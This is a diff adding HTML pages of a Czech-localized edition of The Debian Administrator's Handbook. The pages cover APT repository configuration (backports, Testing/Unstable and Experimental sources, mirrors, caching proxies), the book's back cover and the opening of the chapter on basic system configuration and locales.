+                  class="distribution distribution">Stable</span>.
+				</div><div
+                class="para">
+					When the distribution becomes a little dated, numerous software projects have released new versions that are not integrated into the current <span
+                  class="distribution distribution">Stable</span> (which is only modified to address the most critical problems, such as security problems). Since the <span
+                  class="distribution distribution">Testing</span> and <span
+                  class="distribution distribution">Unstable</span> distributions can be more risky, package maintainers sometimes offer recompilations of recent software applications for <span
+                  class="distribution distribution">Stable</span>, which has the advantage to limit potential instability to a small number of chosen packages. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://backports.debian.org">http://backports.debian.org</a></div>
+				</div><a
+                id="id-1.9.10.7.11.7"
+                class="indexterm"></a><div
+                class="para">
+					Backports from <code
+                  class="literal">stable-backports</code> are always created from packages available in <span
+                  class="distribution distribution">Testing</span>. This ensures that all installed backports will be upgradable to the corresponding stable version once the next stable release of Debian is available.
+				</div><div
+                class="para">
+					Even though this repository provides newer versions of packages, APT will not install them unless you give explicit instructions to do so (or unless you have already done so with a former version of the given backport):
+				</div><pre
+                class="screen"><code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>sudo apt-get install <em
+                      class="replaceable">package</em>/stretch-backports
+</code></strong><code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>sudo apt-get install -t stretch-backports <em
+                      class="replaceable">package</em>
+</code></strong></pre></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.8"></a>6.1.3. Repositories for <span
+                      class="distribution distribution">Testing</span>/<span
+                      class="distribution distribution">Unstable</span> Users</h3></div></div></div><div
+              class="para">
+				Here is a standard <code
+                class="filename">sources.list</code> for a system running the <span
+                class="distribution distribution">Testing</span> or <span
+                class="distribution distribution">Unstable</span> version of Debian:
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="example.testing-sources-list"></a><p
+                class="title"><strong>Příklad 6.2. <code
+                    class="filename">/etc/apt/sources.list</code> file for users of Debian <span
+                    class="distribution distribution">Testing</span>/<span
+                    class="distribution distribution">Unstable</span></strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Unstable
+deb http://deb.debian.org/debian unstable main contrib non-free
+deb-src http://deb.debian.org/debian unstable main contrib non-free
+
+# Testing
+deb http://deb.debian.org/debian testing main contrib non-free
+deb-src http://deb.debian.org/debian testing main contrib non-free
+
+# Stable
+deb http://deb.debian.org/debian stable main contrib non-free
+deb-src http://deb.debian.org/debian stable main contrib non-free
+
+# Security updates
+deb http://security.debian.org/ stable/updates main contrib non-free
+deb http://security.debian.org/ testing/updates main contrib non-free
+deb-src http://security.debian.org/ stable/updates main contrib non-free
+deb-src http://security.debian.org/ testing/updates main contrib non-free
+</pre></div></div><div
+              class="para">
+				With this <code
+                class="filename">sources.list</code> file APT will install packages from <span
+                class="distribution distribution">Unstable</span>. If that is not desired, use the <code
+                class="literal">APT::Default-Release</code> setting (see <a
+                class="xref"
+                href="sect.apt-get.html#sect.apt-upgrade">6.2.3 – „System Upgrade“</a>) to instruct APT to pick packages from another distribution (most likely <span
+                class="distribution distribution">Testing</span> in this case).
+			</div><div
+              class="para">
+				There are good reasons to include all those repositories, even though a single one should be enough. <span
+                class="distribution distribution">Testing</span> users will appreciate the possibility to cherry-pick a fixed package from <span
+                class="distribution distribution">Unstable</span> when the version in <span
+                class="distribution distribution">Testing</span> is affected by an annoying bug. On the opposite, <span
+                class="distribution distribution">Unstable</span> users bitten by unexpected regressions have the possibility to downgrade packages to their (supposedly working) <span
+                class="distribution distribution">Testing</span> version.
+			</div><div
+              class="para">
+				The inclusion of <span
+                class="distribution distribution">Stable</span> is more debatable but it often gives access to some packages which have been removed from the development versions. It also ensures that you get the latest updates for packages which have not been modified since the last stable release.
+			</div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.9.10.8.7"></a>6.1.3.1. The <span
+                        class="distribution distribution">Experimental</span> Repository</h4></div></div></div><a
+                id="id-1.9.10.8.7.2"
+                class="indexterm"></a><div
+                class="para">
+					The archive of <span
+                  class="distribution distribution">Experimental</span> packages is present on all Debian mirrors, and contains packages which are not in the <span
+                  class="distribution distribution">Unstable</span> version yet because of their substandard quality — they are often software development versions or pre-versions (alpha, beta, release candidate…). A package can also be sent there after undergoing subsequent changes which can generate problems. The maintainer then tries to uncover them with help from advanced users who can handle important issues. After this first stage, the package is moved into <span
+                  class="distribution distribution">Unstable</span>, where it reaches a much larger audience and where it will be tested in much more detail.
+				</div><div
+                class="para">
+					<span
+                  class="distribution distribution">Experimental</span> is generally used by users who do not mind breaking their system and then repairing it. This distribution gives the possibility to import a package which a user wants to try or use as the need arises. That is exactly how Debian approaches it, since adding it in APT's <code
+                  class="filename">sources.list</code> file does not lead to the systematic use of its packages. The line to be added is:
+				</div><div
+                class="informalexample"><pre
+                  class="programlisting">deb http://deb.debian.org/debian experimental main contrib non-free
+</pre></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.9"></a>6.1.4. Using Alternate Mirrors</h3></div></div></div><a
+              id="id-1.9.10.9.2"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="filename">sources.list</code> examples in this chapter refer to package repositories hosted on <code
+                class="literal">deb.debian.og</code>. Those URLs will redirect you to servers which are close to you and which are managed by Content Delivery Networks (<acronym
+                class="acronym">CDN</acronym>) whose main role is to store multiple copies of the files across the world to deliver them as fast as possible to users. The CDN companies that Debian is working with are Debian partners who are offering their services freely to Debian. While none of those servers are under direct control of Debian, the fact that the whole archive is sealed by GPG signatures makes it a non-issue.
+			</div><a
+              id="id-1.9.10.9.4"
+              class="indexterm"></a><a
+              id="id-1.9.10.9.5"
+              class="indexterm"></a><div
+              class="para">
+				Picky users who are not satisfied with the performance of <code
+                class="literal">deb.debian.org</code> can try to find a better mirror in the official mirror list: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/mirror/list">https://www.debian.org/mirror/list</a></div>
+			</div><div
+              class="para">
+				But when you don't know which mirror is best for you, this list is of not much use. Fortunately for you, Debian maintains DNS entries of the form <code
+                class="literal">ftp.<em
+                  class="replaceable">country-code</em>.debian.org</code> (e.g. <code
+                class="literal">ftp.us.debian.org</code> for the USA, <code
+                class="literal">ftp.fr.debian.org</code> for France, etc.) which are covering many countries and which are pointing to one (or more) of the best mirrors available within that country.
+			</div><a
+              id="id-1.9.10.9.8"
+              class="indexterm"></a><div
+              class="para">
+				As an alternative to <code
+                class="literal">deb.debian.org</code>, there used to be <code
+                class="literal">httpredir.debian.org</code>. This service would identify a mirror close to you (among the list of official mirrors, using GeoIP mainly) and would redirect APT's requests to that mirror. This service has been deprecated due to reliability concerns and now <code
+                class="literal">httpredir.debian.org</code> provides the same CDN-based service as <code
+                class="literal">deb.debian.org</code>.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.10"></a>6.1.5. Non-Official Resources: <code
+                      class="literal">mentors.debian.net</code></h3></div></div></div><a
+              id="id-1.9.10.10.2"
+              class="indexterm"></a><div
+              class="para">
+				There are numerous non-official sources of Debian packages set up by advanced users who have recompiled some software (Ubuntu made this popular with their Personal Package Archive service), by programmers who make their creation available to all, and even by Debian developers who offer pre-versions of their package online.
+			</div><div
+              class="para">
+				The <code
+                class="literal">mentors.debian.net</code> site is interesting (although it only provides source packages), since it gathers packages created by candidates to the status of official Debian developer or by volunteers who wish to create Debian packages without going through that process of integration. These packages are made available without any guarantee regarding their quality; make sure that you check their origin and integrity and then test them before you consider using them in production.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>COMMUNITY</em></span> The <code
+                          class="literal">debian.net</code> sites</strong></p></div></div></div><a
+                id="id-1.9.10.10.5.2"
+                class="indexterm"></a><div
+                class="para">
+				The <span
+                  class="emphasis"><em>debian.net</em></span> domain is not an official resource of the Debian project. Each Debian developer may use that domain name for their own use. These websites can contain unofficial services (sometimes personal sites) hosted on a machine which does not belong to the project and set up by Debian developers, or even prototypes about to be moved on to <span
+                  class="emphasis"><em>debian.org</em></span>. Two reasons can explain why some of these prototypes remain on <span
+                  class="emphasis"><em>debian.net</em></span>: either no one has made the necessary effort to transform it into an official service (hosted on the <span
+                  class="emphasis"><em>debian.org</em></span> domain, and with a certain guarantee of maintenance), or the service is too controversial to be officialized.
+			</div></div><div
+              class="para">
+				Installing a package means giving root rights to its creator, because they decide on the contents of the initialization scripts which are run under that identity. Official Debian packages are created by volunteers who have been co-opted and reviewed and who can seal their packages so that their origin and integrity can be checked.
+			</div><div
+              class="para">
+				In general, be wary of a package whose origin you don't know and which isn't hosted on one of the official Debian servers: evaluate the degree to which you can trust the creator, and check the integrity of the package. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://mentors.debian.net/">http://mentors.debian.net/</a></div>
+			</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.snapshot.debian.org"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Old package versions: <code
+                          class="literal">snapshot.debian.org</code></strong></p></div></div></div><a
+                id="id-1.9.10.10.8.2"
+                class="indexterm"></a><div
+                class="para">
+				The <code
+                  class="literal">snapshot.debian.org</code> service, introduced in April 2010, can be used to “go backwards in time” and to find an old version of a package. It can be used for example to identify which version of a package introduced a regression, and more concretely, to come back to the former version while waiting for the regression fix.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.11"></a>6.1.6. Caching Proxy for Debian Packages</h3></div></div></div><a
+              id="id-1.9.10.11.2"
+              class="indexterm"></a><a
+              id="id-1.9.10.11.3"
+              class="indexterm"></a><div
+              class="para">
+				When an entire network of machines is configured to use the same remote server to download the same updated packages, any administrator knows that it would be beneficial to have an intermediate proxy acting as a network-local cache (see sidebar <a
+                class="xref"
+                href="sect.apt-cache.html#sidebar.cache"><span
+                  class="emphasis"><em>VOCABULARY</em></span> Cache</a>).
+			</div><div
+              class="para">
+				You can configure APT to use a "standard" proxy (see <a
+                class="xref"
+                href="sect.apt-get.html#sect.apt-config">6.2.4 – „Configuration Options“</a> for the APT side, and <a
+                class="xref"
+                href="sect.http-ftp-proxy.html">11.6 – „HTTP/FTP Proxy“</a> for the proxy side), but the Debian ecosystem offers better options to solve this problem. The dedicated software presented in this section are smarter than a plain proxy cache because they can rely on the specific structure of APT repositories (for instance they know when individual files are obsolete or not, and thus adjust the time during which they are kept).
+			</div><a
+              id="id-1.9.10.11.6"
+              class="indexterm"></a><a
+              id="id-1.9.10.11.7"
+              class="indexterm"></a><div
+              class="para">
+				<span
+                class="pkg pkg">apt-cacher</span> and <span
+                class="pkg pkg">apt-cacher-ng</span> work like usual proxy cache servers. APT's <code
+                class="filename">sources.list</code> is left unchanged, but APT is configured to use them as proxy for outgoing requests.
+			</div><a
+              id="id-1.9.10.11.9"
+              class="indexterm"></a><div
+              class="para">
+				<span
+                class="pkg pkg">approx</span>, on the other hand, acts like an HTTP server that “mirrors” any number of remote repositories in its top-level URLs. The mapping between those top-level directories and the remote URLs of the repositories is stored in <code
+                class="filename">/etc/approx/approx.conf</code>:
+			</div><pre
+              class="programlisting">
+# &lt;name&gt; &lt;repository-base-url&gt;
+debian   http://deb.debian.org/debian
+security http://security.debian.org
+</pre><div
+              class="para">
+				<span
+                class="pkg pkg">approx</span> runs by default on port 9999 via a systemd socket and requires the users to adjust their <code
+                class="filename">sources.list</code> file to point to the approx server:
+			</div><pre
+              class="programlisting"># Sample sources.list pointing to a local approx server
+deb http://apt.falcot.com:9999/security stretch/updates main contrib non-free
+deb http://apt.falcot.com:9999/debian stretch main contrib non-free
+</pre></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.coexistence-with-other-packaging-systems.html"><strong>Předcházející</strong>5.5. Coexistence with Other Packaging Systems</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-get.html"><strong>Další</strong>6.2. aptitude, apt-get, and apt Commands</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/backcover.html b/publish/cs-CZ/Debian/9/html/debian-handbook/backcover.html
new file mode 100644
index 000000000..049bd49cb
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/backcover.html
@@ -0,0 +1,99 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Příloha C. The Debian Administrator's Handbook</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.user-space.html"
+        title="B.5. The User Space" /><link
+        rel="next"
+        href="website.html"
+        title="Příloha D. Get the book" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/backcover.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.user-space.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="website.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="appendix"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="backcover"></a>Příloha C. The Debian Administrator's Handbook</h1></div><div><h3
+                class="subtitle"><em>Debian Jessie from Discovery to Mastery</em></h3></div></div></div><div
+          class="para">
+		Debian GNU/Linux, a very popular non-commercial Linux distribution, is known for its reliability and richness. Built and maintained by an impressive network of thousands of developers throughout the world, the Debian project is cemented by its social contract. This foundation text defines the project's objective: fulfilling the needs of users with a 100% free operating system. The success of Debian and of its ecosystem of derivative distributions (with Ubuntu at the forefront) means that an increasing number of administrators are exposed to Debian's technologies.
+	</div><div
+          class="para">
+		This Debian Administrator's Handbook, which has been entirely updated for Debian 8 “Jessie”, builds on the success of its 6 previous editions. Accessible to all, this book teaches the essentials to anyone who wants to become an effective and independent Debian GNU/Linux administrator. It covers all the topics that a competent Linux administrator should master, from installation to updating the system, creating packages and compiling the kernel, but also monitoring, backup and migration, without forgetting advanced topics such as setting up SELinux or AppArmor to secure services, automated installations, or virtualization with Xen, KVM or LXC.
+	</div><div
+          class="para">
+		This book is not only designed for professional system administrators. Anyone who uses Debian or Ubuntu on their own computer is de facto an administrator and will find tremendous value in knowing more about how their system works. Being able to understand and resolve problems will save you invaluable time.
+	</div><div
+          class="para">
+		<span
+            class="strong strong"><strong>Raphaël Hertzog</strong></span> is a computer science engineer who graduated from the National Institute of Applied Sciences (INSA) in Lyon, France, and has been a Debian developer since 1997. The founder of Freexian, the first French IT services company specialized in Debian GNU/Linux, he is one of the most prominent contributors to this Linux distribution.
+	</div><div
+          class="para">
+		<span
+            class="strong strong"><strong>Roland Mas</strong></span> is a telecommunications engineer who graduated from the National Superior School of Telecommunications (ENST) in Paris, France. A Debian developer since 2000 as well as the developer of the FusionForge software, he works as a freelance consultant who specializes in the installation and migration of Debian GNU/Linux systems and in setting up collaborative work tools.
+	</div><div
+          class="para">
+		This book has a story. It started its life as a French-language book (Cahier de l'Admin Debian published by Eyrolles) and has been translated into English thanks to hundreds of persons who contributed to a fundraising. Learn more at https://debian-handbook.info, where you can also obtain an electronic version of this book.
+	</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.user-space.html"><strong>Předcházející</strong>B.5. The User Space</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="website.html"><strong>Další</strong>Příloha D. Get the book</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/basic-configuration.html b/publish/cs-CZ/Debian/9/html/debian-handbook/basic-configuration.html
new file mode 100644
index 000000000..334b016ba
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/basic-configuration.html
@@ -0,0 +1,417 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 8. Basic Configuration: Network, Accounts, Printing...</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.common-procedures.html"
+        title="7.2. Common Procedures" /><link
+        rel="next"
+        href="sect.network-config.html"
+        title="8.2. Configuring the Network" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/basic-configuration.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.common-procedures.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.network-config.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="basic-configuration"></a>Kapitola 8. Basic Configuration: Network, Accounts, Printing...</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="basic-configuration.html#sect.config-language-support">8.1. Configuring the System for Another Language</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="basic-configuration.html#sect.default-language">8.1.1. Setting the Default Language</a></span></dt><dt><span
+                    class="section"><a
+                      href="basic-configuration.html#sect.keyboard-config">8.1.2. Configuring the Keyboard</a></span></dt><dt><span
+                    class="section"><a
+                      href="basic-configuration.html#sect.utf8-migration">8.1.3. Migrating to UTF-8</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.network-config.html">8.2. Configuring the Network</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.interface-ethernet">8.2.1. Ethernet Interface</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.interface-wireless">8.2.2. Wireless Interface</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.ppp-rtc">8.2.3. Connecting with PPP through a PSTN Modem</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.adsl">8.2.4. Connecting through an ADSL Modem</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.roaming-network-config">8.2.5. Automatic Network Configuration for Roaming Users</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.hostname-name-service.html">8.3. Setting the Hostname and Configuring the Name Service</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.hostname-name-service.html#sect.name-resolution">8.3.1. Name Resolution</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.user-group-databases.html">8.4. User and Group Databases</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.etc-passwd">8.4.1. User List: <code
+                        class="filename">/etc/passwd</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.etc-shadow">8.4.2. The Hidden and Encrypted Password File: <code
+                        class="filename">/etc/shadow</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.account-modification">8.4.3. Modifying an Existing Account or Password</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.disabling-account">8.4.4. Disabling an Account</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.etc-group">8.4.5. Group List: <code
+                        class="filename">/etc/group</code></a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.creating-accounts.html">8.5. Creating Accounts</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.shell-environment.html">8.6. Shell Environment</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.config-printing.html">8.7. Printer Configuration</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.config-bootloader.html">8.8. Configuring the Bootloader</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html#sect.identify-disks">8.8.1. Identifying the Disks</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html#sect.config-lilo">8.8.2. Configuring LILO</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html#sect.config-grub">8.8.3. GRUB 2 Configuration</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html#sect.config-yaboot">8.8.4. For Macintosh Computers (PowerPC): Configuring Yaboot</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.config-misc.html">8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.timezone">8.9.1. Timezone</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.time-synchronization">8.9.2. Time Synchronization</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.rotation-logs">8.9.3. Rotating Log Files</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.sharing-admin-rights">8.9.4. Sharing Administrator Rights</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.fstab-mount-points">8.9.5. List of Mount Points</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.locate-updatedb">8.9.6. <code
+                        class="command">locate</code> and <code
+                        class="command">updatedb</code></a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.kernel-compilation.html">8.10. Compiling a Kernel</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.kernel-compilation-prerequisites">8.10.1. Introduction and Prerequisites</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.kernel-sources">8.10.2. Getting the Sources</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.config-kernel">8.10.3. Configuring the Kernel</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.kernel-build">8.10.4. Compiling and Building the Package</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.modules-build">8.10.5. Compiling External Modules</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.kernel-patch">8.10.6. Applying a Kernel Patch</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.kernel-installation.html">8.11. Installing a Kernel</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.kernel-installation.html#sect.kernel-package">8.11.1. Features of a Debian Kernel Package</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-installation.html#sect.kernel-installation-with-dpkg">8.11.2. Installing with <code
+                        class="command">dpkg</code></a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		A computer with a new installation created with <code
+              class="command">debian-installer</code> is intended to be as functional as possible, but many services still have to be configured. Furthermore, it is always good to know how to change certain configuration elements defined during the initial installation process.
+	</div></div><div
+          class="para">
+		This chapter reviews everything included in what we could call the “basic configuration”: networking, language and locales, users and groups, printing, mount points, etc.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-language-support"></a>8.1. Configuring the System for Another Language</h2></div></div></div><a
+            id="id-1.11.5.2"
+            class="indexterm"></a><div
+            class="para">
+			If the system was installed using French, the machine will probably already have French set as the default language. But it is good to know what the installer does to set the language, so that later, if the need arises, you can change it.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> The <code
+                        class="command">locale</code> command to display the current configuration</strong></p></div></div></div><div
+              class="para">
+			The <code
+                class="command">locale</code> command lists a summary of the current configuration of various locale parameters (date format, numbers format, etc.), presented in the form of a group of standard environment variables dedicated to the dynamic modification of these settings.
+		</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.default-language"></a>8.1.1. Setting the Default Language</h3></div></div></div><a
+              id="id-1.11.5.5.2"
+              class="indexterm"></a><a
+              id="id-1.11.5.5.3"
+              class="indexterm"></a><a
+              id="id-1.11.5.5.4"
+              class="indexterm"></a><div
+              class="para">
+				A locale is a group of regional settings. This includes not only the language for text, but also the format for displaying numbers, dates, times, and monetary sums, as well as the alphabetical comparison rules (to properly account for accented characters). Although each of these parameters can be specified independently from the others, we generally use a locale, which is a coherent set of values for these parameters corresponding to a “region” in the broadest sense. These locales are usually indicated under the form, <code
+                class="literal"><em
+                  class="replaceable">language-code</em>_<em
+                  class="replaceable">COUNTRY-CODE</em></code>, sometimes with a suffix to specify the character set and encoding to be used. This enables consideration of idiomatic or typographical differences between different regions with a common language.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> Character sets</strong></p></div></div></div><a
+                id="id-1.11.5.5.6.2"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.3"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.4"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.5"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.6"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.7"
+                class="indexterm"></a><div
+                class="para">
+				Historically, each locale has an associated “character set” (group of known characters) and a preferred “encoding” (internal representation for characters within the computer).
+			</div><div
+                class="para">
+				The most popular encodings for latin-based languages were limited to 256 characters because they opted to use a single byte for each character. Since 256 characters was not enough to cover all European languages, multiple encodings were needed, and that is how we ended up with <span
+                  class="emphasis"><em>ISO-8859-1</em></span> (also known as “Latin 1”) up to <span
+                  class="emphasis"><em>ISO-8859-15</em></span> (also known as “Latin 9”), among others.
+			</div><div
+                class="para">
+				Working with foreign languages often implied regular switches between various encodings and character sets. Furthermore, writing multilingual documents led to further, almost intractable problems. Unicode (a super-catalog of nearly all writing systems from all of the world's languages) was created to work around this problem. One of Unicode's encodings, UTF-8, retains all 128 ASCII symbols (7-bit codes), but handles other characters differently. Those are preceded by a specific escape sequence of a few bits, which implicitly defines the length of the character. This allows encoding all Unicode characters on a sequence of one or more bytes. Its use has been popularized by the fact that it is the default encoding in XML documents.
+			</div><a
+                id="id-1.11.5.5.6.11"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.12"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.13"
+                class="indexterm"></a><div
+                class="para">
+				This is the encoding that should generally be used, and is thus the default on Debian systems.
+			</div></div><div
